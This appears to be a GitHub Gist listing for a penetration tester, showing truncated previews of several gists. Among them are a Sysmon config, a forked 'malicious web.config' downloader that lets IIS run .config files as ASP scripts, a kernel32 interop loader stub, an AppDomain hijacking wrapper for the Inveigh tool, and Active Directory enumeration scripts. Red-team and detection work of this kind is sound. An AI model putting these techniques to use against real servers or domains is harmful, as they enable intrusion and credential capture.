Scott Sutherland nullbind
nullbind
/ allthesysmon.xml
Created
January 30, 2023 15:37
— forked from MHaggis/allthesysmon.xml
Hunt Naked
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Sysmon schemaversion="4.81"> | |
| <HashAlgorithms>md5,sha256</HashAlgorithms> | |
| <DnsLookup>False</DnsLookup> | |
| <CheckRevocation>False</CheckRevocation> | |
| <ArchiveDirectory>sysmon</ArchiveDirectory> | |
| <EventFiltering> | |
| <!--Event ID 1: Process creation--> | |
| <ProcessCreate onmatch="exclude"></ProcessCreate> | |
| <!--Event ID 2: A process changed a file creation time--> | |
| <FileCreateTime onmatch="exclude"></FileCreateTime> |
nullbind
/ downloader web.config
Created
July 7, 2022 20:51
— forked from gazcbm/downloader web.config
Malicious web.config's
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Setup native functions so they can be called through c# | |
| $win32 = @" | |
| using System.Runtime.InteropServices; | |
| using System; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.Security.Cryptography; | |
| using System.Runtime.InteropServices; | |
| using System.Collections.Generic; | |
| // ------------------------------------------------------------------------- | |
| // Instructions for compiling DLL and using via PowerShell on the fly | |
| // ------------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| File: Crypt-It.ps1 | |
| Author: Scott Sutherland (@_nullbind), NetSPI - 2021 | |
| Version: 1.1 | |
| Description: The Crypt-It function provide the ability to encrypt/decrypt data and files using AES password based and public/private key encryption. | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| TODO |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ------------------------------------------- | |
| # Function: Get-DomainInfoADPS | |
| # Author: Scott Sutherland (@_nullbind), NetSPI | |
| # Version: 1.7 | |
| # This script can be used to dump interesting | |
| # information from Active Directory. | |
| # This function requires the Active Directory | |
| # PowerShell Module, but the script supports | |
| # loading it from bytes in the file. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| AppDomain Hijacking Execution Method | |
| Payload: Inveight Wrapper | |
| Description: This can be used to run Inveigh through appdomain hijacking. | |
| Mitre ATT&CK ID: T1038 | |
| Author: Kevin Robertson - Inveigh, Scott Sutherland - Wrapper | |
| Credits: Based on techniques by Casey Smith. | |
| Execution Option: Config File |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DomainObject | |
| { | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory = $false, | |
| HelpMessage = 'Domain user to authenticate with domain\user.')] | |
| [string]$Username, | |
| [Parameter(Mandatory = $false, | |
| HelpMessage = 'Domain password to authenticate with domain\user.')] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Work in progress | |
| # Automation goals | |
| # 1 enumeration HTTP proxy configurations on Windows and AD domain joined systems | |
| # 2 parse the proxies | |
| # 3 test for unauthenticated outbound internet access. | |
| # 4 produce inventory of available proxies and if auth is requires (proxy_url, proxy_port, proxy_source, authentication_required) | |
| # ---------------------------------- | |
| # Get-HttpProxyInfo | |
| # ---------------------------------- |
NewerOlder